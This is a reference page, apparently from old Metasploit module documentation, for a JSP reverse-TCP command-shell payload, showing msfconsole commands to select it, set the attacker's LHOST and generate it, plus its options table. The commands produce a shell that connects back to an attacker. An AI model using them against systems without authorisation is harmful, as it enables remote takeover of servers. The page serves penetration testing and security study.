Metasploit Penetration Testing Framework
Java JSP Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell
Rank
- Normal
Authors
- sf < stephen_fewer [at] harmonysecurity.com >
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/java/jsp_shell_reverse_tcp
msf payload(jsp_shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(jsp_shell_reverse_tcp) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/java/jsp_shell_reverse_tcp
msf payload(jsp_shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(jsp_shell_reverse_tcp) > generate
Module Options
| LHOST | The local address |
| LPORT | The local port (default: 4444) |
| SHELL | The system shell to use. (default: cmd.exe) |
| AutoRunScript | A script to automatically on session creation. |
| InitialAutoRunScript | An initial script to run on session created (before AutoRunScript) |
| ReverseConnectRetries | The number of connection attempts to try before exiting the process |
| WORKSPACE | Specify the workspace for this module |
Metasploit Framework 3.3.3Copyright © 2003-2010 Rapid7 LLC